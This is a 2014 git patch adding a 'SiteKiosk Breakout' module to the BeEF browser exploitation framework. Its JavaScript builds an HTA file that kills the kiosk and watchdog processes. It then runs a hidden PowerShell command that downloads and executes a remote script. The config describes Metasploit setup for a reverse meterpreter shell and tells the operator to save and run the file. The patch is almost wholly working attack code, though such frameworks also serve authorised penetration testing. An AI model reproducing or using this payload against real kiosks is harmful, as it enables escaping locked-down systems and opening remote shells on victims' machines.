From c24a8c2ec5f568d259eaa3e7e28c055fa62b52fa Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Sun, 7 Sep 2014 23:18:41 +0200
Subject: [PATCH] Added @insertscript module to break-out from SiteKiosk

---
 .../sitekiosk_breakout/command.js             | 20 +++++++++++++
 .../sitekiosk_breakout/config.yaml            | 16 ++++++++++
 .../sitekiosk_breakout/module.rb              | 29 +++++++++++++++++++
 3 files changed, 65 insertions(+)
 create mode 100644 modules/social_engineering/sitekiosk_breakout/command.js
 create mode 100644 modules/social_engineering/sitekiosk_breakout/config.yaml
 create mode 100644 modules/social_engineering/sitekiosk_breakout/module.rb

diff --git a/modules/social_engineering/sitekiosk_breakout/command.js b/modules/social_engineering/sitekiosk_breakout/command.js
new file mode 100644
index 000000000..da99103db
--- /dev/null
+++ b/modules/social_engineering/sitekiosk_breakout/command.js
@@ -0,0 +1,20 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+    if(beef.browser.isIE()){
+        // application='yes' is IE-only and needed to load the HTA into an IFrame.
+        // in this way you can have your phishing page, and load the HTA on top of it
+        // beef.dom.createIframe('hidden', {'src':hta_url,'application':'yes'});
+	bb = new MSBlobBuilder();
+	bb.append('<script>new ActiveXObject("WScript.Shell").Run(\'taskkill.exe /F /IM Watchdog.exe\');<\/script>');
+	bb.append('<script>new ActiveXObject("WScript.Shell").Run(\'taskkill.exe /F /IM SiteKiosk.exe\');<\/script>');
+	bb.append('<script>new ActiveXObject("WScript.Shell").Run(\'powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring(\\\\\\"<%= @payload_handler %>\\\\\\"))"\');<\/script>');
+	window.navigator.msSaveOrOpenBlob(bb.getBlob(),"BREAKOUT.hta");
+        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'HTA loaded into hidden IFrame.');
+    }
+});
diff --git a/modules/social_engineering/sitekiosk_breakout/config.yaml b/modules/social_engineering/sitekiosk_breakout/config.yaml
new file mode 100644
index 000000000..83f57dd36
--- /dev/null
+++ b/modules/social_engineering/sitekiosk_breakout/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        sitekiosk_breakout:
+            enable: true
+            category: ["Social Engineering"]
+            name: "SiteKiosk Breakout"
+            description: "This Module breaks out of SiteKiosk by using HTA. The HTA closes the kiosk and starts a reverse meterpreter shell via a powershell payload!<br>Before launching the module, do the following on Metasploit:<br>use exploit/windows/misc/psh_web_delivery<br>set URIPATH /psh<br>set PAYLOAD windows/meterpreter/reverse_https<br>set LHOST x.x.x.x<br>set LPORT 443<br>set ExitOnSession false<br>set AutoRunScript post/windows/manage/smart_migrate<br>exploit -j -z<br><br>After executing the module, follow this steps:<br>Click Save<br>Enter shell:ProgramFiles in the Save Dialogs adressbar<br>Navigate to C:\\Users\\Public\\Downloads<br>Save the file<br>After the Download is finished click on execute<br>Profit"
+            authors: ["insertscript"]
+            target:
+                user_notify: ["IE"]
+                not_working: ["ALL"]
diff --git a/modules/social_engineering/sitekiosk_breakout/module.rb b/modules/social_engineering/sitekiosk_breakout/module.rb
new file mode 100644
index 000000000..3ccffa20a
--- /dev/null
+++ b/modules/social_engineering/sitekiosk_breakout/module.rb
@@ -0,0 +1,29 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Sitekiosk_breakout < BeEF::Core::Command
+
+  def pre_send
+
+    # gets the value configured in the module configuration by the user
+    @datastore.each do |input|
+      if input['name'] == "payload_handler"
+        @payload_handler = input['value']
+      end
+    end
+
+  end
+
+	def self.options
+		return [
+			{'name' => 'payload_handler', 'ui_label'=>'Payload Handler',  'value' =>'http://10.10.10.10:8080/psh'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end